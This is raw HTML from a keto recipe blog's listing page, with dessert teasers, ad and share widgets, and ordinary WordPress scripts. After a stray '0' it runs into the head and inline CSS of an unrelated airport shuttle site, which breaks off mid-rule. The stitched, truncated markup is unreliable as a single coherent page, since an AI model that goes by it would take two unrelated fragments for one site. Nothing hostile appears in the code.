class="comments-link"> <a href="https://ketogenicwoman.com/keto-chocolate-peanut-butter-dessert-bars/#comments">2 Comments</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/keto-chocolate-peanut-butter-dessert-bars/" title="Keto Chocolate Peanut Butter Dessert Bars"><img width="150" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-150x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="Keto Chocolate Peanut Butter Dessert Bars" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-150x150.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-300x300.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-200x200.jpg 200w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-320x320.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-480x480.jpg 480w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-720x720.jpg 720w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar-735x735.jpg 735w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Chocolate-Peanut-Butter-Cheesecake-Bar.jpg 750w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Keto Chocolate Peanut Butter Dessert Bars I am always up for any keto dessert bar that combines chocolate and peanut butter!&nbsp; There is a reason that Chocolate Peanut cups are always at or near the top of the list of best selling candy bars in North America.&nbsp; I am definitely … <a class="continue-reading-link" href="https://ketogenicwoman.com/keto-chocolate-peanut-butter-dessert-bars/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/keto-chocolate-peanut-butter-dessert-bars/" data-a2a-title="Keto Chocolate Peanut Butter Dessert Bars"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-chocolate-peanut-butter-dessert-bars%2F&amp;linkname=Keto%20Chocolate%20Peanut%20Butter%20Dessert%20Bars" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-chocolate-peanut-butter-dessert-bars%2F&amp;linkname=Keto%20Chocolate%20Peanut%20Butter%20Dessert%20Bars" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-chocolate-peanut-butter-dessert-bars%2F&amp;linkname=Keto%20Chocolate%20Peanut%20Butter%20Dessert%20Bars" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-chocolate-peanut-butter-dessert-bars%2F&amp;linkname=Keto%20Chocolate%20Peanut%20Butter%20Dessert%20Bars" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-chocolate-peanut-butter-dessert-bars%2F&amp;linkname=Keto%20Chocolate%20Peanut%20Butter%20Dessert%20Bars" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/chocolate/" rel="tag">chocolate</a>, <a href="https://ketogenicwoman.com/tag/low-carb-desserts/" rel="tag">Low Carb Desserts</a></span> </footer> </article> <article id="post-1786" class="post-1786 post type-post status-publish format-standard has-post-thumbnail hentry category-keto-desserts tag-blueberry tag-lemon tag-low-carb-desserts"> <header class="entry-header"> <h2 class="entry-title"> <a href="https://ketogenicwoman.com/keto-lemon-blueberry-coffee-cake/" title="Permalink to Keto Lemon Blueberry Coffee Cake" rel="bookmark"> Keto Lemon Blueberry Coffee Cake </a> </h2> <div class="entry-meta"> <span class="author vcard"> By <a class="url fn n" rel="author" href="https://ketogenicwoman.com/author/anitabreeze/" title="View all posts by KetoWoman">KetoWoman</a> <span class="bl_sep">|</span></span> <time class="onDate date published" datetime="2019-02-02T13:01:37-07:00"> <a href="https://ketogenicwoman.com/keto-lemon-blueberry-coffee-cake/" title="" rel="bookmark"><span class="entry-date"></span> <span class="entry-time"> - </span></a> </time><span class="bl_sep">|</span><time class="updated" datetime="2019-02-09T04:30:30-07:00"></time> <span class="bl_categ"> <a href="https://ketogenicwoman.com/category/recipes/keto-desserts/" rel="tag">Keto Desserts</a> </span> <div class="comments-link"> <a href="https://ketogenicwoman.com/keto-lemon-blueberry-coffee-cake/#comments">2 Comments</a> </div> </div> </header> <div class="entry-summary"> <a class="post-thumbnail-link" href="https://ketogenicwoman.com/keto-lemon-blueberry-coffee-cake/" title="Keto Lemon Blueberry Coffee Cake"><img width="150" height="150" src="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-150x150.jpg" class="alignleft post-thumbnail wp-post-image" alt="Coffee with Low Carb Lemon Blueberry Coffeecake with a crumb topping" srcset="https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-150x150.jpg 150w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-300x300.jpg 300w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-768x768.jpg 768w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-1024x1024.jpg 1024w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-200x200.jpg 200w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-320x320.jpg 320w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-480x480.jpg 480w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-720x720.jpg 720w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake-735x735.jpg 735w, https://ketogenicwoman.com/wp-content/uploads/2019/02/Keto-Lemon-Blueberry-Coffeecake.jpg 1080w" sizes="(max-width: 150px) 100vw, 150px" /></a> <p>Keto Lemon Blueberry Coffee Cake with Crumble Topping Lately I&#8217;m making a lot of recipes from my childhood.&nbsp; I&#8217;m sure it&#8217;s because I have my elderly Mom living in the house now. I know time is not on her side and the nostalgia is setting in big time! In the … <a class="continue-reading-link" href="https://ketogenicwoman.com/keto-lemon-blueberry-coffee-cake/"> Continue reading <span class="meta-nav">&rarr; </span></a></p> <div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_32 addtoany_list" data-a2a-url="https://ketogenicwoman.com/keto-lemon-blueberry-coffee-cake/" data-a2a-title="Keto Lemon Blueberry Coffee Cake"><a class="a2a_button_facebook a2a_counter external" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-lemon-blueberry-coffee-cake%2F&amp;linkname=Keto%20Lemon%20Blueberry%20Coffee%20Cake" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_twitter external" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-lemon-blueberry-coffee-cake%2F&amp;linkname=Keto%20Lemon%20Blueberry%20Coffee%20Cake" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_pinterest a2a_counter external" href="https://www.addtoany.com/add_to/pinterest?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-lemon-blueberry-coffee-cake%2F&amp;linkname=Keto%20Lemon%20Blueberry%20Coffee%20Cake" title="Pinterest" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit external" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-lemon-blueberry-coffee-cake%2F&amp;linkname=Keto%20Lemon%20Blueberry%20Coffee%20Cake" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_tumblr external" href="https://www.addtoany.com/add_to/tumblr?linkurl=https%3A%2F%2Fketogenicwoman.com%2Fketo-lemon-blueberry-coffee-cake%2F&amp;linkname=Keto%20Lemon%20Blueberry%20Coffee%20Cake" title="Tumblr" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share external" href="https://www.addtoany.com/share" rel="nofollow" target="_blank"></a></div></div> </div> <footer class="entry-meta2"> <span class="bl_tagg">Tagged <a href="https://ketogenicwoman.com/tag/blueberry/" rel="tag">blueberry</a>, <a href="https://ketogenicwoman.com/tag/lemon/" rel="tag">lemon</a>, <a href="https://ketogenicwoman.com/tag/low-carb-desserts/" rel="tag">Low Carb Desserts</a></span> </footer> </article> <div class='pagination_container'><nav class='pagination'><span class='current'>1</span><a href='https://ketogenicwoman.com/page/2/' class='inactive'>2</a><a href='https://ketogenicwoman.com/page/3/' class='inactive'>3</a><a href='https://ketogenicwoman.com/page/2/'>&rsaquo;</a><a href='https://ketogenicwoman.com/page/10/'>&raquo;</a></nav></div> <ul class="yoyo"> <li id="text-8" class="widget-container widget_text"> <div class="textwidget"><p><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </li> </ul> </div> <div id="primary" class="widget-area" role="complementary"> <ul class="xoxo"> <li id="a2a_follow_widget-2" class="widget-container widget_a2a_follow_widget"><div class="a2a_kit a2a_kit_size_32 a2a_follow addtoany_list"><a class="a2a_button_facebook external" href="https://www.facebook.com/KetogenicWoman" title="Facebook" rel="noopener nofollow" target="_blank"></a><a class="a2a_button_instagram external" href="https://www.instagram.com/ketogenic.woman" title="Instagram" rel="noopener nofollow" target="_blank"></a><a class="a2a_button_pinterest external" href="https://www.pinterest.com/KetogenicWoman" title="Pinterest" rel="noopener nofollow" target="_blank"></a></div></li><li id="search-2" class="widget-container widget_search"><form method="get" id="searchform" action="https://ketogenicwoman.com/"> <label> <span class="screen-reader-text">Search for:</span> <input type="search" class="s" placeholder="Search" value="" name="s" /> </label> <button type="submit" class="searchsubmit"><span class="screen-reader-text">Search</span>OK</button> </form> </li><li id="categories-2" class="widget-container widget_categories"><h3 class="widget-title">Categories</h3><form action="https://ketogenicwoman.com" method="get"><label class="screen-reader-text" for="cat">Categories</label><select name='cat' id='cat' class='postform'> <option value='-1'>Select Category</option> <option class="level-0" value="2">Daily Musings</option> <option class="level-0" value="97">Egg Fast Diet</option> <option class="level-0" value="90">Fat Bomb Recipes</option> <option class="level-0" value="223">Keto Chicken &amp; Poultry Recipes</option> <option class="level-0" value="230">Keto Desserts</option> <option class="level-0" value="228">Keto Egg Fast Recipes</option> <option class="level-0" value="229">Keto Main Meals</option> <option class="level-0" value="242">Keto Pork Recipes</option> <option class="level-0" value="8">Ketogenic Diet Info</option> <option class="level-0" value="91">Low Carb Breakfasts</option> <option class="level-0" value="4">Recipes</option> <option class="level-0" value="119">Zero Carb</option> </select> </form> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "cat" ); function onCatChange() { if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) { dropdown.parentNode.submit(); } } dropdown.onchange = onCatChange; })(); /* ]]> */ </script> </li><li id="custom_html-2" class="widget_text widget-container widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></li><li id="custom_html-6" class="widget_text widget-container widget_custom_html"><div class="textwidget custom-html-widget"><a href="https://a7faanv4qdt73f6gt9vbfola4s.hop.clickbank.net/?tid=KWB" target="_blank" rel="noopener noreferrer nofollow" class="external"><img src="https://ketogenicwoman.com/wp-content/uploads/2019/01/101-instant-pot-recipes-for-the-complete-beginner-300-by-250.jpg " data-pin-nopin="true" /></a> </div></li><li id="text-4" class="widget-container widget_text"> <div class="textwidget">Affiliate Disclosure <span style="font-size:x-small">We participate in the Amazon Services LLC Associates Program. Therefore, some of these recommendations will result in this page earning a small commission. This will not affect the price that you pay at all. </span> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div> </li><li id="custom_html-3" class="widget_text widget-container widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></li> <li id="recent-posts-3" class="widget-container widget_recent_entries"> <h3 class="widget-title">My Recent Articles</h3> <ul> <li> <a href="https://ketogenicwoman.com/homemade-keto-electrolyte-drink/">The Best Homemade Electrolyte Drink to Beat Keto Flu Fast</a> </li> <li> <a href="https://ketogenicwoman.com/keto-sheet-pan-shrimp-and-vegetables/">Keto Sheet Pan Dinner &#8211; Roasted Asian Shrimp and Veggies</a> </li> <li> <a href="https://ketogenicwoman.com/keto-egg-fast-lemon-bars/">Keto Egg Fast Lemon Bars</a> </li> <li> <a href="https://ketogenicwoman.com/easy-keto-rack-of-lamb/">Easy Keto Rack of Lamb with Herbs and Garlic</a> </li> </ul> </li><li id="text-11" class="widget-container widget_text"><h3 class="widget-title">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</h3> <div class="textwidget"><p><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </li> </ul> <ul class="xoxo"> <li id="text-10" class="widget-container widget_text"> <div class="textwidget"><p><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </li> </ul> </div> </section> <div style="clear:both;"></div> </div> </div> <footer id="footer" role="contentinfo"> <div id="colophon"> <div id="footer-widget-area" role="complementary" class="footertwo"> <div id="first" class="widget-area"> <ul class="xoxo"> <li id="custom_html-5" class="widget_text widget-container widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <ins class="adsbygoogle" style="display: block;" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></div></li> </ul> </div> <div id="second" class="widget-area"> <ul class="xoxo"> <li id="text-9" class="widget-container widget_text"> <div class="textwidget"><p><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><br /> <br /> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8961298991154207" data-ad-slot="1683393510" data-ad-format="auto" data-full-width-responsive="true"></ins><br /> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </li> </ul> </div> </div> </div> <div id="footer2"> <nav class="footermenu"><ul id="menu-footer-menu" class="menu"><li id="menu-item-2384" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2384"><a href="https://ketogenicwoman.com/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-2385" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2385"><a href="https://ketogenicwoman.com/terms-and-disclaimer/">Terms, Disclaimers and Cookies</a></li> </ul></nav><div style="text-align:center;clear:both;padding-top:4px;"> <a href="https://ketogenicwoman.com/" title="Ketogenic Woman" rel="home"> Ketogenic Woman</a> | Powered by <a target="_blank" href="http://www.cryoutcreations.eu" title="Mantra Theme by Cryout Creations" class="external" rel="nofollow">Mantra</a> &amp; <a target="_blank" href="http://wordpress.org/" title="Semantic Personal Publishing Platform" class="external" rel="nofollow"> WordPress. </a> </div> <div class="socials" id="sfooter"> </div> </div> </footer> </div> <script type='text/javascript' src='https://ketogenicwoman.com/wp-includes/js/wp-embed.min.js?ver=731ab13a1601c31a46fdc5b218a03556'></script> <script src="https://my.hellobar.com/f1524a0f4bbdbc667078bef9d00f92283a175060.js" type="text/javascript" charset="utf-8" async="async"></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" > <head> <title>southtahoeairporter &#8211; southtahoeairporter</title> <script type="text/javascript">var ajaxurl = "http://southtahoeairporter.com/wp-admin/admin-ajax.php"</script><style id="critical-path-css" type='text/css'>body,html{width:100%;height:100%;margin:0;padding:0}.page-preloader{top:0;left:0;z-index:999;position:fixed;height:100%;width:100%;text-align:center}.preloader-logo,.preloader-preview-area{top:50%;max-height:calc(50% - 20px);opacity:1}.preloader-preview-area{-webkit-animation-delay:-.2s;animation-delay:-.2s;-webkit-transform:translateY(100%);-ms-transform:translateY(100%);transform:translateY(100%);margin-top:10px;width:100%;text-align:center;position:absolute}.preloader-logo{max-width:90%;-webkit-transform:translateY(-100%);-ms-transform:translateY(-100%);transform:translateY(-100%);margin:-10px auto 0;position:relative}.ball-pulse>div,.ball-scale>div,.line-scale>div{margin:2px;display:inline-block}.ball-pulse>div{width:15px;height:15px;border-radius:100%;-webkit-animation:ball-pulse .75s infinite cubic-bezier(.2,.68,.18,1.08);animation:ball-pulse .75s infinite cubic-bezier(.2,.68,.18,1.08)}.ball-pulse>div:nth-child(1){-webkit-animation-delay:-.36s;animation-delay:-.36s}.ball-pulse>div:nth-child(2){-webkit-animation-delay:-.24s;animation-delay:-.24s}.ball-pulse>div:nth-child(3){-webkit-animation-delay:-.12s;animation-delay:-.12s}@-webkit-keyframes ball-pulse{0%,80%{-webkit-transform:scale(1);transform:scale(1);opacity:1}45%{-webkit-transform:scale(.1);transform:scale(.1);opacity:.7}}@keyframes ball-pulse{0%,80%{-webkit-transform:scale(1);transform:scale(1);opacity:1}45%{-webkit-transform:scale(.1);transform:scale(.1);opacity:.7}}.ball-clip-rotate-pulse{position:relative;-webkit-transform:translateY(-15px);-ms-transform:translateY(-15px);transform:translateY(-15px);display:inline-block}.ball-clip-rotate-pulse>div{-webkit-animation-fill-mode:both;animation-fill-mode:both;position:absolute;top:0;left:0;border-radius:100%}.ball-clip-rotate-pulse>div:first-child{height:36px;width:36px;top:7px;left:-7px;-webkit-animation:ball-clip-rotate-pulse-scale 1s 0s cubic-bezier(.09,.57,.49,.9) infinite;animation:ball-clip-rotate-pulse-scale 1s 0s cubic-bezier(.09,.57,.49,.9) infinite}.ball-clip-rotate-pulse>div:last-child{position:absolute;width:50px;height:50px;left:-16px;top:-2px;background:0 0;border:2px solid;-webkit-animation:ball-clip-rotate-pulse-rotate 1s 0s cubic-bezier(.09,.57,.49,.9) infinite;animation:ball-clip-rotate-pulse-rotate 1s 0s cubic-bezier(.09,.57,.49,.9) infinite;-webkit-animation-duration:1s;animation-duration:1s}@-webkit-keyframes ball-clip-rotate-pulse-rotate{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(.6);transform:rotate(180deg) scale(.6)}100%{-webkit-transform:rotate(360deg) scale(1);transform:rotate(360deg) scale(1)}}@keyframes ball-clip-rotate-pulse-rotate{0%{-webkit-transform:rotate(0) scale(1);transform:rotate(0) scale(1)}50%{-webkit-transform:rotate(180deg) scale(.6);transform:rotate(180deg) scale(.6)}100%{-webkit-transform:rotate(360deg) scale(1);transform:rotate(360deg) scale(1)}}@-webkit-keyframes ball-clip-rotate-pulse-scale{30%{-webkit-transform:scale(.3);transform:scale(.3)}100%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes ball-clip-rotate-pulse-scale{30%{-webkit-transform:scale(.3);transform:scale(.3)}100%{-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes square-spin{25%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(0);transform:perspective(100px) rotateX(180deg) rotateY(0)}50%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(180deg);transform:perspective(100px) rotateX(180deg) rotateY(180deg)}75%{-webkit-transform:perspective(100px) rotateX(0) rotateY(180deg);transform:perspective(100px) rotateX(0) rotateY(180deg)}100%{-webkit-transform:perspective(100px) rotateX(0) rotateY(0);transform:perspective(100px) rotateX(0) rotateY(0)}}@keyframes square-spin{25%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(0);transform:perspective(100px) rotateX(180deg) rotateY(0)}50%{-webkit-transform:perspective(100px) rotateX(180deg) rotateY(180deg);transform:perspective(100px) rotateX(180deg) rotateY(180deg)}75%{-webkit-transform:perspective(100px) rotateX(0) rotateY(180deg);transform:perspective(100px) rotateX(0) rotateY(180deg)}100%{-webkit-transform:perspective(100px) rotateX(0) rotateY(0);transform:perspective(100px) rotateX(0) rotateY(0)}}.square-spin{display:inline-block}.square-spin>div{width:50px;height:50px;-webkit-animation:square-spin 3s 0s cubic-bezier(.09,.57,.49,.9) infinite;animation:square-spin 3s 0s cubic-bezier(.09,.57,.49,.9) infinite}.cube-transition{position:relative;-webkit-transform:translate(-25px,-25px);-ms-transform:translate(-25px,-25px);transform:translate(-25px,-25px);display:inline-block}.cube-transition>div{width:15px;height:15px;position:absolute;top:-5px;left:-5px;-webkit-animation:cube-transition 1.6s 0s infinite ease-in-out;animation:cube-transition 1.6s 0s infinite ease-in-out}.cube-transition>div:last-child{-webkit-animation-delay:-.8s;animation-delay:-.8s}@-webkit-keyframes cube-transition{25%{-webkit-transform:translateX(50px) scale(.5) rotate(-90deg);transform:translateX(50px) scale(.5) rotate(-90deg)}50%{-webkit-transform:translate(50px,50px) rotate(-180deg);transform:translate(50px,50px) rotate(-180deg)}75%{-webkit-transform:translateY(50px) scale(.5) rotate(-270deg);transform:translateY(50px) scale(.5) rotate(-270deg)}100%{-webkit-transform:rotate(-360deg);transform:rotate(-360deg)}}@keyframes cube-transition{25%{-webkit-transform:translateX(50px) scale(.5) rotate(-90deg);transform:translateX(50px) scale(.5) rotate(-90deg)}50%{-webkit-transform:translate(50px,50px) rotate(-180deg);transform:translate(50px,50px) rotate(-180deg)}75%{-webkit-transform:translateY(50px) scale(.5) rotate(-270deg);transform:translateY(50px) scale(.5) rotate(-270deg)}100%{-webkit-transform:rotate(-360deg);transform:rotate(-360deg)}}.ball-scale>div{border-radius:100%;height:60px;width:60px;-webkit-animation:ball-scale 1s 0s ease-in-out infinite;animation:ball-scale 1s 0s ease-in-out infinite}@-webkit-keyframes ball-scale{0%{-webkit-transform:scale(0);transform:scale(0)}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}@keyframes ball-scale{0%{-webkit-transform:scale(0);transform:scale(0)}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}.line-scale>div{-webkit-animation-fill-mode:both;animation-fill-mode:both;width:5px;height:50px;border-radius:2px}.line-scale>div:nth-child(1){-webkit-animation:line-scale 1s -.5s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.5s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale>div:nth-child(2){-webkit-animation:line-scale 1s -.4s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.4s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale>div:nth-child(3){-webkit-animation:line-scale 1s -.3s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.3s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale>div:nth-child(4){-webkit-animation:line-scale 1s -.2s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.2s infinite cubic-bezier(.2,.68,.18,1.08)}.line-scale>div:nth-child(5){-webkit-animation:line-scale 1s -.1s infinite cubic-bezier(.2,.68,.18,1.08);animation:line-scale 1s -.1s infinite cubic-bezier(.2,.68,.18,1.08)}@-webkit-keyframes line-scale{0%,100%{-webkit-transform:scaley(1);transform:scaley(1)}50%{-webkit-transform:scaley(.4);transform:scaley(.4)}}@keyframes line-scale{0%,100%{-webkit-transform:scaley(1);transform:scaley(1)}50%{-webkit-transform:scaley(.4);transform:scaley(.4)}}.ball-scale-multiple{position:relative;-webkit-transform:translateY(30px);-ms-transform:translateY(30px);transform:translateY(30px);display:inline-block}.ball-scale-multiple>div{border-radius:100%;position:absolute;left:-30px;top:0;opacity:0;margin:0;width:50px;height:50px;-webkit-animation:ball-scale-multiple 1s 0s linear infinite;animation:ball-scale-multiple 1s 0s linear infinite}.ball-scale-multiple>div:nth-child(2),.ball-scale-multiple>div:nth-child(3){-webkit-animation-delay:-.2s;animation-delay:-.2s}@-webkit-keyframes ball-scale-multiple{0%{-webkit-transform:scale(0);transform:scale(0);opacity:0}5%{opacity:1}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}@keyframes ball-scale-multiple{0%{-webkit-transform:scale(0);transform:scale(0);opacity:0}5%{opacity:1}100%{-webkit-transform:scale(1);transform:scale(1);opacity:0}}.ball-pulse-sync{display:inline-block}.ball-pulse-sync>div{width:15px;height:15px;border-radius:100%;margin:2px;-webkit-animation-fill-mode:both;animation-fill-mode:both;display:inline-block}.ball-pulse-sync>div:nth-child(1){-webkit-animation:ball-pulse-sync .6s -.21s infinite ease-in-out;animation:ball-pulse-sync .6s -.21s infinite ease-in-out}.ball-pulse-sync>div:nth-child(2){-webkit-animation:ball-pulse-sync .6s -.14s infinite ease-in-out;animation:ball-pulse-sync .6s -.14s infinite ease-in-out}.ball-pulse-sync>div:nth-child(3){-webkit-animation:ball-pulse-sync .6s -70ms infinite ease-in-out;animation:ball-pulse-sync .6s -70ms infinite ease-in-out}@-webkit-keyframes ball-pulse-sync{33%{-webkit-transform:translateY(10px);transform:translateY(10px)}66%{-webkit-transform:translateY(-10px);transform:translateY(-10px)}100%{-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes ball-pulse-sync{33%{-webkit-transform:translateY(10px);transform:translateY(10px)}66%{-webkit-transform:translateY(-10px);transform:translateY(-10px)}100%{-webkit-transform:translateY(0);transform:translateY(0)}}.transparent-circle{display:inline-block;border-top:.5em solid rgba(255,255,255,.2);border-right:.5em solid rgba(255,255,255,.2);border-bottom:.5em solid rgba(255,255,255,.2);border-left:.5em solid #fff;-webkit-transform:translateZ(0);transform:translateZ(0);-webkit-animation:transparent-circle 1.1s infinite linear;animation:transparent-circle 1.1s infinite linear;width:50px;height:50px;border-radius:50%}.transparent-circle:after{border-radius:50%;width:10em;height:10em}@-webkit-keyframes transparent-circle{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes transparent-circle{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.ball-spin-fade-loader{position:relative;top:-10px;left:-10px;display:inline-block}.ball-spin-fade-loader>div{width:15px;height:15px;border-radius:100%;margin:2px;position:absolute;-webkit-animation:ball-spin-fade-loader 1s infinite linear;animation:ball-spin-fade-loader 1s infinite 